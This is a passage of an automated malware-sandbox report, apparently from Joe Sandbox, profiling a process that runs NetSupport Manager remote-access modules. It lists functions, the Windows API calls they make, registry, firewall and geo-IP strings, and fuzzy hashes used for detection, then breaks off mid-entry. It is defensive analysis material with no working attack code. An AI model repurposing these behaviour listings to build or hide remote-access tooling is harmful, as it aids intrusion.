                                                                                      • Instruction ID: 01093d0ef8ba3b8d66a1f5e3f4838d53f0bc1b4d1e9212342b6ef41ebc516d7c
                                                                                      • Opcode Fuzzy Hash: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                      • Instruction Fuzzy Hash: 64410E79F0411AABD700DFA59C81E9EFBB9EB8462CF524535F909E7240EA306904CBE1
                                                                                      Function 1102C410 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                      • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                        • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                      • GetTickCount.KERNEL32 ref: 1102C574
                                                                                        • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                        • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                      • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                      • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                      • API String ID: 596640303-1725438197
                                                                                      • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                      • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                      • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                      • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                      Function 11061700 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                        • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                        • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Enum$Open$CloseValue
                                                                                      • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                      • API String ID: 2823542970-1528906934
                                                                                      • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                      • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                      • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                      • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                      Function 11137630 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • GetTickCount.KERNEL32 ref: 11137692
                                                                                        • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                        • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                        • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                        • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                      • GetTickCount.KERNEL32 ref: 111376A1
                                                                                      • _memset.LIBCMT ref: 111376E3
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                      • _strrchr.LIBCMT ref: 11137708
                                                                                      • _free.LIBCMT ref: 1113775A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                      • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                      • API String ID: 711243594-1270230032
                                                                                      • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                      • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                      • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                      • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                      Function 6C5D7610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ioctlsocket.WSOCK32 ref: 6C5D7642
                                                                                      • connect.WSOCK32(00000000,?,?), ref: 6C5D7659
                                                                                      • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6C5D7660
                                                                                      • _memmove.LIBCMT ref: 6C5D76D3
                                                                                      • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C5D76F3
                                                                                      • GetTickCount.KERNEL32 ref: 6C5D7717
                                                                                      • ioctlsocket.WSOCK32 ref: 6C5D775C
                                                                                      • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C5D7762
                                                                                      • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C5D777A
                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6C5D778B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                      • String ID: *BlockingIO$ConnectTimeout$General
                                                                                      • API String ID: 4218156244-2969206566
                                                                                      • Opcode ID: ce216dd1b8016a28e30687b62eeb501ad2fd43b4a61ae7b04e5e5c1d2e8c6ab6
                                                                                      • Instruction ID: c61fb15bd987e2e7e68fd7515e20124b0a7e663a183b22da689ba305607cbf09
                                                                                      • Opcode Fuzzy Hash: ce216dd1b8016a28e30687b62eeb501ad2fd43b4a61ae7b04e5e5c1d2e8c6ab6
                                                                                      • Instruction Fuzzy Hash: A4414D71900314DBE720DB68CC48BDE73BAEF84305F41449AE51993A41EB70AE49CFA9
                                                                                      Function 11133E80 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                        • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                        • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                        • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                        • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                        • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                      • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                      • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                      • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                      • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                      • GetDC.USER32(00000000), ref: 11133F03
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                      • CreateWindowExA.USER32(00000001,NSMWClass,0286E260,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                      • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                      • API String ID: 1594747848-1114959992
                                                                                      • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                      • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                      • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                      • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                      Function 1102CC10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,A1BC2D8B,?,00000000,00000000), ref: 1102CE44
                                                                                      • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                      • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                      • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                      • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                      • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                      • API String ID: 83693535-2077998243
                                                                                      • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                      • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                      • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                      • Instruction Fuzzy Hash: 27B19475E012259FDB25DFA4CD80BEDB7B5BB48708F5041E9E919AB381DB70AA80CF50
                                                                                      Function 11132BF0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 11132C60
                                                                                      • GetTickCount.KERNEL32 ref: 11132C91
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                      • GetTickCount.KERNEL32 ref: 11132CAC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$FolderPathwsprintf
                                                                                      • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                      • API String ID: 1170620360-4157686185
                                                                                      • Opcode ID: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                      • Instruction ID: 1138b9c1199a8041912b1953dd267279d987a2a799c8ea79b9a25deb6d60bab0
                                                                                      • Opcode Fuzzy Hash: 8db97a347cf6facb783ebfea5336d263050bbd002d3c3d3218a55bc412e7ce30
                                                                                      • Instruction Fuzzy Hash: F33157BAE4022E67E700AFB0AC84FEDF36C9B9471EF1000A9E915A7145EA72B545C761
                                                                                      Function 111450A0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                      • _memset.LIBCMT ref: 1114512D
                                                                                        • Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                      • _strncpy.LIBCMT ref: 111451FA
                                                                                        • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                      • RegCloseKey.KERNEL32(00000000), ref: 11145296
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                      • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                      • API String ID: 3299820421-2117887902
                                                                                      • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                      • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                      • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                      • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                      Function 11026BA0 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _strtok.LIBCMT ref: 11026C26
                                                                                      • _strtok.LIBCMT ref: 11026C60
                                                                                      • Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
